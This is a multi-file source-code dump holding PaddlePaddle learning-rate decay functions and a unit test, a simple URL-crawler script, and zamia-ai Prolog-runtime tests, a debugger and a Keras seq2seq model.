# Get static_func from AST
static_func, file_name = ast_to_func(root_wrapper.node, dyfunc)
return static_func, dygraph_to_static
```
#### File: fluid/layers/learning_rate_scheduler.py
```python
from __future__ import print_function
import math
import numbers
from . import control_flow
from . import nn
from . import ops
from . import tensor
from ..framework import default_main_program, Parameter, unique_name, name_scope
from ..framework import Variable
from ..framework import in_dygraph_mode
from ..dygraph import learning_rate_scheduler as imperate_lr
__all__ = [
'exponential_decay', 'natural_exp_decay', 'inverse_time_decay',
'polynomial_decay', 'piecewise_decay', 'noam_decay', 'cosine_decay',
'linear_lr_warmup'
]
def _decay_step_counter(begin=0):
# the first global step is zero in learning rate decay
global_step = nn.autoincreased_step_counter(
counter_name='@LR_DECAY_COUNTER@', begin=begin, step=1)
global_step = tensor.cast(global_step, 'float32')
return global_step
def noam_decay(d_model, warmup_steps, learning_rate=1.0):
"""
Noam decay method. The numpy implementation of noam decay as follows.
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# set hyper parameters
base_lr = 0.01
d_model = 2
current_steps = 20
warmup_steps = 200
# compute
lr_value = base_lr * np.power(d_model, -0.5) * np.min([
np.power(current_steps, -0.5),
np.power(warmup_steps, -1.5) * current_steps])
Please reference `attention is all you need
<https://arxiv.org/pdf/1706.03762.pdf>`_.
Args:
d_model(Variable): The dimensionality of input and output of model.
warmup_steps(Variable): A super parameter.
learning_rate(Variable|float|int): The initial learning rate. If the type
is Variable, it's a tensor with shape [1], the data type can be
float32 or float64. It also can be set to python int number. Default 1.0
Returns:
The decayed learning rate.
Examples:
.. code-block:: python
import paddle.fluid as fluid
warmup_steps = 100
learning_rate = 0.01
lr = fluid.layers.learning_rate_scheduler.noam_decay(
1/(warmup_steps *(learning_rate ** 2)),
warmup_steps,
learning_rate)
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.NoamDecay(
d_model, warmup_steps, learning_rate=learning_rate)
return decay
else:
global_step = _decay_step_counter(1)
a = global_step**-0.5
b = (warmup_steps**-1.5) * global_step
lr_value = learning_rate * (d_model**-0.5) * nn.elementwise_min(a,
b)
return lr_value
def exponential_decay(learning_rate, decay_steps, decay_rate, staircase=False):
"""
Applies exponential decay to the learning rate.
When training a model, it is often recommended to lower the learning rate as the
training progresses. By using this function, the learning rate will be decayed by
'decay_rate' every 'decay_steps' steps.
Decayed learning rate calculates as follows:
>>> if staircase == True:
>>> decayed_learning_rate = learning_rate * decay_rate ^ floor(global_step / decay_steps)
>>> else:
>>> decayed_learning_rate = learning_rate * decay_rate ^ (global_step / decay_steps)
Args:
learning_rate(Variable|float): The initial learning rate. It should be a Variable
or a float
decay_steps(int): The learning rate decay steps. See the decay computation above.
decay_rate(float): The learning rate decay rate. See the decay computation above.
staircase(bool): If True, decay the learning rate at discrete intervals, which
means the learning rate will be decayed by `decay_rate` every
`decay_steps`. If False, learning rate will be decayed continuously
and following the formula above. Default: False
Returns:
Variable: The decayed learning rate. The data type is float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
base_lr = 0.1
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.layers.exponential_decay(
learning_rate=base_lr,
decay_steps=10000,
decay_rate=0.5,
staircase=True))
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.ExponentialDecay(learning_rate, decay_steps,
decay_rate, staircase)
return decay
else:
global_step = _decay_step_counter()
div_res = global_step / decay_steps
if staircase:
div_res = ops.floor(div_res)
decayed_lr = learning_rate * (decay_rate**div_res)
return decayed_lr
def natural_exp_decay(learning_rate, decay_steps, decay_rate, staircase=False):
"""Applies natural exponential decay to the initial learning rate.
When training a model, it is often recommended to lower the learning rate as the
training progresses. By using this function, the learning rate will be decayed by
natural exponential power 'decay_rate' every 'decay_steps' steps.
Decayed learning rate calculates as follows:
>>> if not staircase:
>>> decayed_learning_rate = learning_rate * exp(- decay_rate * (global_step / decay_steps))
>>> else:
>>> decayed_learning_rate = learning_rate * exp(- decay_rate * floor(global_step / decay_steps))
Args:
learning_rate(Variable|float): The initial learning rate. It should be a Variable
or a float
decay_steps(int): The learning rate decay steps. See the decay computation above.
decay_rate(float): The learning rate decay rate. See the decay computation above.
staircase(bool): If True, decay the learning rate at discrete intervals, which
means the learning rate will be decayed by natural exponential power
`decay_rate` every `decay_steps`. If False, learning rate will be
decayed continuously and following the formula above. Default: False
Returns:
The decayed learning rate. The data type is float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
base_lr = 0.1
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.layers.natural_exp_decay(
learning_rate=base_lr,
decay_steps=10000,
decay_rate=0.5,
staircase=True))
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.NaturalExpDecay(learning_rate, decay_steps,
decay_rate, staircase)
return decay
else:
global_step = _decay_step_counter()
div_res = global_step / decay_steps
if staircase:
div_res = ops.floor(div_res)
decayed_lr = learning_rate * ops.exp(-1 * decay_rate * div_res)
return decayed_lr
def inverse_time_decay(learning_rate, decay_steps, decay_rate, staircase=False):
"""
Applies inverse time decay to the initial learning rate.
When training a model, it is often recommended to lower the learning rate as the
training progresses. By using this function, an inverse decay function will be
applied to the initial learning rate.
Decayed learning rate calculates as follows:
>>> if staircase == True:
>>> decayed_learning_rate = learning_rate / (1 + decay_rate * floor(global_step / decay_step))
>>> else:
>>> decayed_learning_rate = learning_rate / (1 + decay_rate * global_step / decay_step)
Args:
learning_rate(Variable|float): The initial learning rate. It should be a Variable
or a float
decay_steps(int): The learning rate decay steps. See the decay computation above.
decay_rate(float): The learning rate decay rate. See the decay computation above.
staircase(bool): If True, decay the learning rate at discrete intervals, which
means the learning rate will be decayed by `decay_rate` times
every `decay_steps`. If False, learning rate will be decayed
continuously and following the formula above. Default: False
Returns:
Variable: The decayed learning rate. The data type is float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
base_lr = 0.1
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.layers.inverse_time_decay(
learning_rate=base_lr,
decay_steps=10000,
decay_rate=0.5,
staircase=True))
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.InverseTimeDecay(learning_rate, decay_steps,
decay_rate, staircase)
return decay
else:
global_step = _decay_step_counter()
div_res = global_step / decay_steps
if staircase:
div_res = ops.floor(div_res)
decayed_lr = learning_rate / (1 + decay_rate * div_res)
return decayed_lr
def polynomial_decay(learning_rate,
decay_steps,
end_learning_rate=0.0001,
power=1.0,
cycle=False):
"""
Applies polynomial decay to the initial learning rate.
.. code-block:: text
if cycle:
decay_steps = decay_steps * ceil(global_step / decay_steps)
else:
global_step = min(global_step, decay_steps)
decayed_learning_rate = (learning_rate - end_learning_rate) *
(1 - global_step / decay_steps) ^ power + end_learning_rate
Args:
learning_rate(Variable|float32): A scalar float32 value or a Variable. This
will be the initial learning rate during training.
decay_steps(int32): A Python `int32` number.
end_learning_rate(float): A Python `float` number.
power(float): A Python `float` number.
cycle(bool): If set true, decay the learning rate every decay_steps.
Returns:
Variable: The decayed learning rate
Examples:
.. code-block:: python
import paddle.fluid as fluid
start_lr = 0.01
total_step = 5000
end_lr = 0
lr = fluid.layers.polynomial_decay(
start_lr, total_step, end_lr, power=1)
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.PolynomialDecay(learning_rate, decay_steps,
end_learning_rate, power, cycle)
return decay
else:
global_step = _decay_step_counter()
if cycle:
div_res = ops.ceil(global_step / decay_steps)
zero_var = tensor.fill_constant(
shape=[1], dtype='float32', value=0.0)
one_var = tensor.fill_constant(
shape=[1], dtype='float32', value=1.0)
with control_flow.Switch() as switch:
with switch.case(global_step == zero_var):
tensor.assign(input=one_var, output=div_res)
decay_steps = decay_steps * div_res
else:
decay_steps_var = tensor.fill_constant(
shape=[1], dtype='float32', value=float(decay_steps))
global_step = nn.elementwise_min(
x=global_step, y=decay_steps_var)
decayed_lr = (learning_rate - end_learning_rate) * \
((1 - global_step / decay_steps) ** power) + end_learning_rate
return decayed_lr
def piecewise_decay(boundaries, values):
"""Applies piecewise decay to the initial learning rate.
The algorithm can be described as the code below.
.. code-block:: text
boundaries = [10000, 20000]
values = [1.0, 0.5, 0.1]
if step < 10000:
learning_rate = 1.0
elif 10000 <= step < 20000:
learning_rate = 0.5
else:
learning_rate = 0.1
Args:
boundaries: A list of steps numbers.
values: A list of learning rate values that will be picked during
different step boundaries.
Returns:
The decayed learning rate.
Examples:
.. code-block:: python
import paddle.fluid as fluid
boundaries = [10000, 20000]
values = [1.0, 0.5, 0.1]
optimizer = fluid.optimizer.Momentum(
momentum=0.9,
learning_rate=fluid.layers.piecewise_decay(boundaries=boundaries, values=values),
regularization=fluid.regularizer.L2Decay(1e-4))
"""
with default_main_program()._lr_schedule_guard():
if len(values) - len(boundaries) != 1:
raise ValueError("len(values) - len(boundaries) should be 1")
if in_dygraph_mode():
decay = imperate_lr.PiecewiseDecay(boundaries, values, 0)
return decay
else:
global_step = _decay_step_counter()
lr = tensor.create_global_var(
shape=[1],
value=0.0,
dtype='float32',
persistable=True,
name="learning_rate")
with control_flow.Switch() as switch:
for i in range(len(boundaries)):
boundary_val = tensor.fill_constant(
shape=[1],
dtype='float32',
value=float(boundaries[i]),
force_cpu=True)
value_var = tensor.fill_constant(
shape=[1], dtype='float32', value=float(values[i]))
with switch.case(global_step < boundary_val):
tensor.assign(value_var, lr)
last_value_var = tensor.fill_constant(
shape=[1],
dtype='float32',
value=float(values[len(values) - 1]))
with switch.default():
tensor.assign(last_value_var, lr)
return lr
def cosine_decay(learning_rate, step_each_epoch, epochs):
"""
Applies cosine decay to the learning rate.
when training a model, it is often recommended to lower the learning rate as the
training progresses. By using this function, the learning rate will be decayed by
following cosine decay strategy.
.. math::
decayed\_lr = learning\_rate * 0.5 * (math.cos * (epoch * \\frac{math.pi}{epochs} ) + 1)
Args:
learning_rate(Variable|float): The initial learning rate.
step_each_epoch(int): the number of steps in an epoch.
epochs(int): the number of epochs.
Returns:
Variable: The decayed learning rate.
Examples:
.. code-block:: python
import paddle.fluid as fluid
base_lr = 0.1
lr = fluid.layers.cosine_decay(
learning_rate = base_lr, step_each_epoch=10000, epochs=120)
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.CosineDecay(learning_rate, step_each_epoch,
epochs)
return decay
else:
global_step = _decay_step_counter()
cur_epoch = ops.floor(global_step / step_each_epoch)
decayed_lr = learning_rate * 0.5 * (
ops.cos(cur_epoch * math.pi / epochs) + 1)
return decayed_lr
def linear_lr_warmup(learning_rate, warmup_steps, start_lr, end_lr):
"""
This operator use the linear learning rate warm up strategy to adjust the learning rate preliminarily before the normal learning rate scheduling.
For more information, please refer to `Bag of Tricks for Image Classification with Convolutional Neural Networks <https://arxiv.org/abs/1812.01187>`_
When global_step < warmup_steps, learning rate is updated as:
.. code-block:: text
linear_step = end_lr - start_lr
lr = start_lr + linear_step * (global_step / warmup_steps)
where start_lr is the initial learning rate, and end_lr is the final learning rate;
When global_step >= warmup_steps, learning rate is updated as:
.. code-block:: text
lr = learning_rate
where lr is the learning_rate after warm-up.
Args:
learning_rate (Variable|float): Learning_rate after warm-up, it could be 1D-Tensor or single value with the data type of float32.
warmup_steps (int): Steps for warm up.
start_lr (float): Initial learning rate of warm up.
end_lr (float): Final learning rate of warm up.
Returns:
Variable: Warm-up learning rate with the same data type as learning_rate.
Examples:
.. code-block:: python
import paddle.fluid as fluid
boundaries = [100, 200]
lr_steps = [0.1, 0.01, 0.001]
learning_rate = fluid.layers.piecewise_decay(boundaries, lr_steps) #case1, 1D-Tensor
#learning_rate = 0.1 #case2, single-value
warmup_steps = 50
start_lr = 1. / 3.
end_lr = 0.1
decayed_lr = fluid.layers.linear_lr_warmup(learning_rate,
warmup_steps, start_lr, end_lr)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
out, = exe.run(fetch_list=[decayed_lr.name])
print(out)
# case1: [0.33333334]
# case2: [0.33333334]
"""
dtype = 'float32'
if isinstance(learning_rate, Variable):
dtype = learning_rate.dtype
linear_step = float(end_lr) - float(start_lr)
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
lr = imperate_lr.LinearLrWarmup(learning_rate, warmup_steps,
start_lr, end_lr)
return lr
else:
lr = tensor.create_global_var(
shape=[1],
value=0.0,
dtype=dtype,
persistable=True,
name="learning_rate_warmup")
global_step = _decay_step_counter()
with control_flow.Switch() as switch:
with switch.case(global_step < warmup_steps):
decayed_lr = start_lr + linear_step * (global_step /
float(warmup_steps))
tensor.assign(decayed_lr, lr)
with switch.default():
if not isinstance(learning_rate, Variable):
learning_rate = tensor.fill_constant(
shape=[1], dtype=dtype, value=float(learning_rate))
tensor.assign(learning_rate, lr)
return lr
```
#### File: tests/unittests/test_fill_any_like_op.py
```python
from __future__ import print_function
import paddle
import paddle.fluid as fluid
import paddle.fluid.core as core
import paddle.compat as cpt
import unittest
import numpy as np
from op_test import OpTest
class TestFillAnyLikeOp(OpTest):
def setUp(self):
self.op_type = "fill_any_like"
self.dtype = np.int32
self.value = 0.0
self.init()
self.inputs = {'X': np.random.random((219, 232)).astype(self.dtype)}
self.attrs = {'value': self.value}
self.outputs = {'Out': self.value * np.ones_like(self.inputs["X"])}
def init(self):
pass
def test_check_output(self):
self.check_output()
class TestFillAnyLikeOpFloat32(TestFillAnyLikeOp):
def init(self):
self.dtype = np.float32
self.value = 0.0
class TestFillAnyLikeOpValue1(TestFillAnyLikeOp):
def init(self):
self.value = 1.0
class TestFillAnyLikeOpValue2(TestFillAnyLikeOp):
def init(self):
self.value = 1e-10
class TestFillAnyLikeOpValue3(TestFillAnyLikeOp):
def init(self):
self.value = 1e-100
class TestFillAnyLikeOpType(TestFillAnyLikeOp):
def setUp(self):
self.op_type = "fill_any_like"
self.dtype = np.int32
self.value = 0.0
self.init()
self.inputs = {'X': np.random.random((219, 232)).astype(self.dtype)}
self.attrs = {
'value': self.value,
'dtype': int(core.VarDesc.VarType.FP32)
}
self.outputs = {
'Out':
self.value * np.ones_like(self.inputs["X"]).astype(np.float32)
}
class TestFillAnyLikeOpOverflow(TestFillAnyLikeOp):
def init(self):
self.value = 1e100
def test_check_output(self):
exception = None
try:
self.check_output(check_dygraph=False)
except core.EnforceNotMet as ex:
exception = ex
self.assertIsNotNone(exception)
class TestFillAnyLikeOpFloat16(TestFillAnyLikeOp):
def init(self):
self.dtype = np.float16
class ApiOnesLikeTest(unittest.TestCase):
def test_out(self):
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
ones = paddle.ones_like(data, device="cpu")
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[ones])
expected_result = np.ones(10, dtype="float64")
self.assertEqual((result == expected_result).all(), True)
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
ones = paddle.ones_like(data, device="cpu", dtype="float32")
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[ones])
expected_result = np.ones(10, dtype="float32")
self.assertEqual((result == expected_result).all(), True)
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
ones = paddle.ones_like(data)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[ones])
expected_result = np.ones(10, dtype="float32")
self.assertEqual((result == expected_result).all(), True)
class ApiZerosLikeTest(unittest.TestCase):
def test_out(self):
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
zeros = paddle.zeros_like(data, device="cpu")
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[zeros])
expected_result = np.zeros(10, dtype="float64")
self.assertEqual((result == expected_result).all(), True)
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
zeros = paddle.zeros_like(data, device="cpu", dtype="float32")
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[zeros])
expected_result = np.zeros(10, dtype="float32")
self.assertEqual((result == expected_result).all(), True)
with fluid.program_guard(fluid.Program()):
data = fluid.data(shape=[10], dtype="float64", name="data")
zeros = paddle.zeros_like(data)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
result, = exe.run(feed={"data": np.random.rand(10)},
fetch_list=[zeros])
expected_result = np.zeros(10, dtype="float32")
self.assertEqual((result == expected_result).all(), True)
class TestOnesZerosError(unittest.TestCase):
def test_errors(self):
def test_device_error1():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data(name="data", shape=[10], dtype="float32")
paddle.ones_like(data, device="opu")
self.assertRaises(ValueError, test_device_error1)
def test_device_error2():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data(name="data", shape=[10], dtype="float32")
paddle.ones_like(data, dtype="float")
self.assertRaises(ValueError, test_device_error2)
def test_device_error3():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data(name="data", shape=[10], dtype="float32")
paddle.zeros_like(data, device="opu")
self.assertRaises(ValueError, test_device_error3)
def test_device_error4():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data(name="data", shape=[10], dtype="float32")
paddle.zeros_like(data, dtype="float")
self.assertRaises(ValueError, test_device_error4)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "0-Yuuki-0/MA1508",
"score": 3
} |
#### File: 0-Yuuki-0/MA1508/Web Crawler.py
```python
import requests
import re
websites = []
tmp = []
def dfs(content):
pattern = re.compile(r'(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')')
results = pattern.findall(content.decode('ISO-8859-1'))
for result in results:
tmp.append(result)
def get_url(url):
if url in websites:
return
try:
r = requests.get(url)
print(r.url)
except:
print('timout', 5)
return
else:
text = r.content
dfs(text)
websites.append(url)
if __name__ == '__main__':
init = 'https://www.mathworks.com'
tmp.append(init)
while len(websites) < 100 and len(tmp) >= 1:
print(str((len(websites) + 1))+"/100")
tmp_url = tmp[0]
del tmp[0]
get_url(tmp_url)
print("Finish")
file = open('urls'+'.txt', 'w+')
for url in websites:
file.write(url + '\n')
file.close()
``` |
{
"source": "0zAND1z/zamia-ai",
"score": 3
} |
#### File: data-tools/names/names_aip.py
```python
import codecs
from nltools import misc
misc.init_app ('names_aip')
def name2pred(name):
res = u''
for c in name:
if c.isalpha():
res += c
return 'name' + res
for gender in ['Female', 'Male']:
with codecs.open('%s20.txt' % gender, 'r', 'utf8') as f:
for line in f:
name = line.strip()
print u'rdfsLabel(%s, de, "%s").' % (name2pred(name), name)
print u'rdfsLabel(%s, en, "%s").' % (name2pred(name), name)
print u'wdpdSexOrGender(%s, wde%s).' % (name2pred(name), gender)
print u'wdpdInstanceOf(%s, wde%sGivenName).' % (name2pred(name), gender)
print
```
#### File: zamia-ai/tests/test_aiprolog.py
```python
import unittest
import logging
import codecs
from nltools import misc
from sqlalchemy.orm import sessionmaker
from zamiaai import model
from zamiaprolog.logicdb import LogicDB
from aiprolog.runtime import AIPrologRuntime
from aiprolog.parser import AIPrologParser
UNITTEST_MODULE = 'unittests'
UNITTEST_CONTEXT = 'unittests'
class TestAIProlog (unittest.TestCase):
def setUp(self):
config = misc.load_config('.airc')
#
# logic DB
#
self.db = LogicDB(model.url)
#
# aiprolog environment setup
#
self.prolog_rt = AIPrologRuntime(self.db)
self.parser = AIPrologParser(self.db)
self.prolog_rt.set_trace(True)
self.db.clear_module(UNITTEST_MODULE)
# @unittest.skip("temporarily disabled")
def test_tokenize(self):
clause = self.parser.parse_line_clause_body("tokenize (de, 'hallo, welt!', X)")
logging.debug('clause: %s' % clause)
solutions = self.prolog_rt.search(clause)
logging.debug('solutions: %s' % repr(solutions))
self.assertEqual (len(solutions), 1)
self.assertEqual (len(solutions[0]['X'].l), 2)
# @unittest.skip("temporarily disabled")
def test_edit_distance(self):
clause = self.parser.parse_line_clause_body("edit_distance (['hallo', 'welt'], ['hallo', 'springfield'], X)")
logging.debug('clause: %s' % clause)
solutions = self.prolog_rt.search(clause)
logging.debug('solutions: %s' % repr(solutions))
self.assertEqual (len(solutions), 1)
self.assertEqual (solutions[0]['X'].f, 1.0)
# class TestMacroEngine (unittest.TestCase):
#
# def setUp(self):
# Session = sessionmaker(bind=model.engine)
# self.session = Session()
#
# def testLocalMacros(self):
#
# me = NLPMacroEngine(self.session)
# discourses = me.macro_expand('de', u'(HAL,|Computer,|Du,|) (Ich bin|Ich fühle mich|Man bin ich|Da bin ich) (zufrieden|so zufrieden|glücklich|so glücklich|froh|so froh)', u'', None)
#
# self.assertEqual(len(discourses), 96)
#
# def testMacroTokens(self):
#
# me = NLPMacroEngine(self.session)
# discourses = me.macro_expand('de', u'hallo (HAL|Computer|Du|lieber computer|) wie geht es dir (heute|)',
# u'foo @MACRO_0:TSTART_W_0 bar @MACRO_0:TEND_W_0 @MACRO_0:W baz @MACRO_1:TEND_W_0?', None)
#
# self.assertEqual(len(discourses), 10)
# self.assertEqual(discourses[0][1], u'foo 1 bar 2 HAL baz 7?')
#
# discourses = me.macro_expand('de', u'foobar what is the full name of (foo|donald trump)',
# u'foo @MACRO_0:TSTART_W_0 bar @MACRO_0:TEND_W_0', None)
#
# self.assertEqual(len(discourses), 2)
# self.assertEqual(discourses[0][1], u'foo 7 bar 8')
# self.assertEqual(discourses[1][1], u'foo 7 bar 9')
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('sqlalchemy.engine').setLevel(logging.WARNING)
unittest.main()
```
#### File: zamia-ai/zamiaai/ai_dbg.py
```python
from __future__ import print_function
import os
import sys
import logging
class AIDbg(object):
def __init__(self, kernal, user_uri, realm, verbose):
self.kernal = kernal
self.user_uri = user_uri
self.realm = realm
self.verbose = verbose
if self.verbose:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
def print_help(self):
print (":h help")
print (":c <skills> compile <skills>")
print (":m show memory / context")
print (":t %s prolog tracing" % ('disable' if self.run_trace else 'enable'))
print (":v verbose logging %s" % ('off' if self.verbose else 'on'))
print (":q quit")
def process_command(self, line):
if line == ":h":
self.print_help()
# FIXME: we'd have to force-reload the python module
elif line[:2] == ":c":
parts = line.split(' ')
if len(parts) < 2:
logging.error('?usage')
self.print_help()
return
self.kernal.compile_skill_multi (parts[1:])
elif line == ":m":
print ("ctx.user = %s" % self.ctx.user)
print ("ctx.realm = %s" % self.ctx.realm)
print ("ctx.lang = %s" % self.ctx.lang)
memd = self.kernal.mem_dump(self.ctx.realm)
for k, v, score in memd:
print(u'MEM(%-8s): %-20s: %s (%f)' % (self.ctx.realm, k, v, score))
memd = self.kernal.mem_dump(self.ctx.user)
for k, v, score in memd:
print(u'MEM(%-8s): %-20s: %s (%f)' % (self.ctx.user, k, v, score))
elif line == ":t":
self.run_trace = not self.run_trace
elif line == ":v":
self.verbose = not self.verbose
if self.verbose:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
else:
logging.error("? command error ('%s')" % line)
self.print_help()
def run(self):
self.ctx = self.kernal.create_context(user=self.user_uri, realm=self.realm)
self.run_trace = False
while True:
line = raw_input ('dbg (:h for help)> ')
if not line:
continue
if len(line)<1:
continue
if line == ':q':
break
if line[0] == ':':
self.process_command(line)
continue
out, score, action = self.kernal.process_input(self.ctx, line, run_trace=self.run_trace)
if action:
logging.info(u'RESP: [%6.1f] %s | action: %s' % (score, out, unicode(action)))
else:
logging.info(u'RESP: [%6.1f] %s ' % (score, out))
```
#### File: zamia-ai/zamiaai/nlp_model.py
```python
from __future__ import print_function
import os
import sys
import logging
import codecs
import math
import json
import shutil
import numpy as np
import tensorflow as tf
from tensorflow import keras
from time import time
from random import randint, random
from copy import deepcopy
import model
from nltools.tokenizer import tokenize
from nltools.misc import mkdirs
# extra decoder symbols
_START = '_START'
_STOP = '_STOP'
_OR = '__OR__'
START_ID = 0
STOP_ID = 1
OR_ID = 2
DEBUG_LIMIT = 0
# DEBUG_LIMIT = 1000
class NLPModel(object):
def __init__(self, lang, session, model_args ):
self.model_dir = model_args['model_dir']
self.lang = lang
self.session = session
self.max_inp_len = model_args['max_input_len']
self.lstm_latent_dim = model_args['lstm_latent_dim']
self.batch_size = model_args['batch_size']
# if global_step>0:
# self.model_fn = '%s/latest.ckpt-%d' % (self.model_dir, global_step)
# else:
# self.model_fn = '%s/latest.ckpt' % (self.model_dir)
self.weights_fn = '%s/weights.h5' % (self.model_dir)
# self.in_dict_fn = '%s/in_dict.csv' % (self.model_dir)
self.decoder_dict_fn = '%s/decoder_dict.csv' % (self.model_dir)
def _compute_2d_diagram(self):
dia = []
longest_inp = []
longest_resp = []
for inp, resp in self.training_data:
inp_len = len(inp)
resp_len = len(resp) + 1 # +1 because EOS_ID gets appended later
while len(dia)<=inp_len:
dia.append([])
while len(dia[inp_len])<=resp_len:
dia[inp_len].append(0)
dia[inp_len][resp_len] += 1
# if inp_len == 8 and 'tallinn' in inp:
# print "2d diagram: %d -> %d %s %s" % (inp_len, resp_len, inp, resp)
if not longest_inp or (inp_len > len(longest_inp[0])):
longest_inp = (deepcopy(inp), deepcopy(resp))
if not longest_resp or (resp_len > len(longest_resp[1])):
longest_resp = (deepcopy(inp), deepcopy(resp))
logging.info('longest input: %s' % repr(longest_inp[0]))
logging.info(' %s' % repr(longest_inp[1]))
logging.info('longest resp : %s' % repr(longest_resp[0]))
logging.info(' %s' % repr(longest_resp[1]))
return dia
def _compute_decoder_dict(self):
self.decoder_dict = {_START : START_ID, _STOP : STOP_ID, _OR : OR_ID}
self.num_segments = 0
for inp, resp in self.training_data:
for pred in resp:
if not pred in self.decoder_dict:
self.decoder_dict[pred] = len(self.decoder_dict)
self.num_segments += 1
logging.info ('decoder dict done: %d entries. num_segments: %d.' %
(len(self.decoder_dict), self.num_segments))
self.reverse_decoder_dict = dict( (i, token) for token, i in self.decoder_dict.items() )
def _save_decoder_dict(self):
with codecs.open(self.decoder_dict_fn, 'w', 'utf8') as f:
f.write("%d\n" % self.max_resp_len)
for k in sorted(self.decoder_dict):
f.write(u"%d;%s\n" % (self.decoder_dict[k], k))
logging.info ('%s written.', self.decoder_dict_fn)
def _load_decoder_dict(self):
with codecs.open(self.decoder_dict_fn, 'r', 'utf8') as f:
self.max_resp_len = int(f.readline().rstrip())
self.decoder_dict = {}
while True:
line = f.readline()
if not line:
break
line = line.lstrip().rstrip()
parts = line.split(';')
self.decoder_dict[parts[1]] = int(parts[0])
logging.info ('%s read, %d entries, max_resp_len=%d.' % (self.decoder_dict_fn, len(self.decoder_dict), self.max_resp_len))
self.reverse_decoder_dict = dict( (i, token) for token, i in self.decoder_dict.items() )
def _load_word_embeddings(self):
embdfn = '%s/word_embeddings.vec' % self.model_dir
logging.info('loading word embeddings from %s ...' % embdfn)
self.embedding_dict = {}
self.embed_dim = 0
with codecs.open(embdfn, encoding='utf-8') as embdf:
first_line = True
for line in embdf:
if first_line:
first_line = False
continue
values = line.rstrip().rsplit(' ')
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
self.embedding_dict[word] = coefs
if not self.embed_dim:
self.embed_dim = coefs.shape[0]
nb_words = len(self.embedding_dict)
logging.info('found %s word vectors of dimension %d.' % (nb_words, self.embed_dim))
def restore(self):
self._load_word_embeddings()
self._load_decoder_dict()
self._create_keras_model()
self.keras_model_train.load_weights(self.weights_fn)
def predict (self, inp):
td_inp = tokenize(inp, lang=self.lang)
num_decoder_tokens = len (self.decoder_dict)
encoder_input_data = np.zeros( (1, self.max_inp_len, self.embed_dim), dtype='float32')
for j, token in enumerate(td_inp):
if unicode(token) in self.embedding_dict:
encoder_input_data[0, j] = self.embedding_dict[unicode(token)]
logging.debug('encoder_input_data[0]: %s' % str(encoder_input_data[0]))
# import pdb; pdb.set_trace()
# Encode the input as state vectors.
states_value = self.keras_model_encoder.predict(encoder_input_data)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1, 1, num_decoder_tokens))
# Populate the first token of target sequence with the start token.
target_seq[0, 0, self.decoder_dict[_START]] = 1.
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sequence = []
while not stop_condition:
output_tokens, h, c = self.keras_model_decoder.predict([target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
sampled_token = self.reverse_decoder_dict[sampled_token_index]
decoded_sequence.append(sampled_token)
logging.debug('sampled_token_index=%d, sampled_token=%s' % (sampled_token_index, sampled_token))
# Exit condition: either hit max length
# or find stop token.
if (sampled_token == _STOP or len(decoded_sequence) > self.max_resp_len):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1, 1, num_decoder_tokens))
target_seq[0, 0, sampled_token_index] = 1.
# Update states
states_value = [h, c]
return decoded_sequence
def _ascii_art(self, n):
if n == 0:
return ' '
if n < 10:
return '.'
if n < 100:
return ';'
if n < 1000:
return 'o'
if n < 10000:
return '*'
return 'X'
def _create_keras_model(self):
# for an explanation on how this works, see:
# https://blog.keras.io/a-ten-minute-introduction-to-sequence-to-sequence-learning-in-keras.html
num_encoder_tokens = self.embed_dim
num_decoder_tokens = len (self.decoder_dict)
# Define an input sequence and process it.
encoder_inputs = keras.layers.Input(shape=(None, num_encoder_tokens))
encoder = keras.layers.LSTM(self.lstm_latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder(encoder_inputs)
# We discard `encoder_outputs` and only keep the states.
